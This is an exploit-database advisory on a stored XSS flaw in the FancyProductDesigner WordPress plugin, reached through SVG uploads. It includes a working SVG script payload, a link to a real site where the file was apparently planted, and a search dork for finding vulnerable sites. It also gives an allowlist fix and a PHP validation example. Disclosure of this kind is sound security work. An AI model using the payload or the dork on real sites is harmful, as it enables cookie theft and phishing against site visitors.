0day.today - Biggest Exploit Database in the World.
WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability
[+]---------------------------------------------------------[+]
| Vulnerable Software: FancyProductDesigner(WP plugin)      |
| Vendor: http://fancyproductdesigner.com                   |
| Vulnerability Type: Stored XSS + FPD / File upload        |
| Date Released: 29/04/2017                                 |
| Released by: 5tarboy (@insecurity)                        |
[+]---------------------------------------------------------[+]

Fancy Product Designer is a paid WordPress plugin ($50 fee) that allows users to upload custom products of their choice to the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG files also. There are an estimated 40,000-50,000 vulnerable sites.

In order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload. Here is an example: https://www.saltsidecreations.com/product/ozark-20-oz/

It is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/

Here is an example SVG file that can be uploaded (resulting in persistent/stored XSS):

------------------------------------------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="300.000000pt" height="300.000000pt" viewBox="0 0 300.000000 300.000000" preserveAspectRatio="xMidYMid meet">
<metadata> twitter: @insecurity </metadata>
<g transform="translate(0.000000,300.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none">
<!-- decorative <path> elements (vector artwork) omitted -->
</g>
<script type="text/javascript"> alert("@insecurity"); </script>
</svg>
------------------------------------------------------------------------------------------------------------

Here is a live example: https://www.saltsidecreations.com/wp-content/uploads/fancy_products_uploads/2017/04/28/insecurity.svg

This could have a variety of impacts, ranging from stealing cookies and regular XSS-related risks to a highly effective spear phishing campaign.

Google Dork: inurl:fancy_products_uploads

------------------------------------------------------------------------------------------------------------

How to fix: Use a whitelist for file upload (e.g. only allow JPG and PNG, no .svg)

There are also multiple full path disclosures for this plugin, but WP is riddled with FPD. If you're interested then get in touch (although I'm pretty sure there are tons of files in /wp-includes/ that will give you FPD anyway, presuming no error_reporting(0) is set).

# 0day.today [2024-12-25] #
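One way to implement the allowlist fix described above, as an added example in plain PHP (not the plugin's or the advisory author's code). The function name `validate_image_upload`, the constant `ALLOWED_IMAGE_TYPES` and the sample files are hypothetical and constructed here; the PHP fileinfo extension is assumed to be enabled.

```php
<?php
declare(strict_types=1);

// Added example: the names below are hypothetical, not taken from the plugin.
// Detected MIME type => extension the file is stored under.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];

/**
 * Decide whether an uploaded file may be stored as a product image.
 * $tmpPath is the server-side temp file, $clientName the name sent by the browser.
 */
function validate_image_upload(string $tmpPath, string $clientName): array
{
    $reject = fn(string $why): array =>
        ['ok' => false, 'reason' => $why, 'stored_name' => null];

    // 1. Extension allowlist (case-insensitive, final extension only).
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png'], true)) {
        return $reject("extension '.$ext' is not on the allowlist");
    }

    // 2. Sniff the content itself. The browser-supplied Content-Type is
    //    attacker-controlled and is deliberately not consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath) ?: 'unknown';
    if (!isset(ALLOWED_IMAGE_TYPES[$mime])) {
        return $reject("content is '$mime', not JPEG or PNG");
    }

    // 3. The file must also parse as a raster image of that same type.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $mime) {
        return $reject('file does not parse as the image type it claims to be');
    }

    // 4. Store under a server-generated name whose extension comes from the
    //    detected type, so the client-supplied name never reaches the uploads dir.
    $stored = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    return ['ok' => true, 'reason' => 'accepted', 'stored_name' => $stored];
}

// --- Constructed sample inputs (not captured from any real site) ---
// A 1x1 PNG, and an SVG that carries a <script> element like the file above.
$png = base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
);
$svg = '<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
     . '<script type="text/javascript">/* script body */</script></svg>';

$cases = [
    ['design.png', $png],  // genuine PNG
    ['design.PNG', $png],  // upper-case extension, still a PNG
    ['design.svg', $svg],  // SVG under its own extension
    ['design.png', $svg],  // SVG renamed to look like a PNG
];

foreach ($cases as [$name, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    $result = validate_image_upload($tmp, $name);
    unlink($tmp);
    printf("%-12s %-7s %s\n", $name, $result['ok'] ? 'ACCEPT' : 'REJECT', $result['reason']);
}
```

In a WordPress upload handler, the same allowlist can also be passed as the `mimes` override to `wp_handle_upload()`.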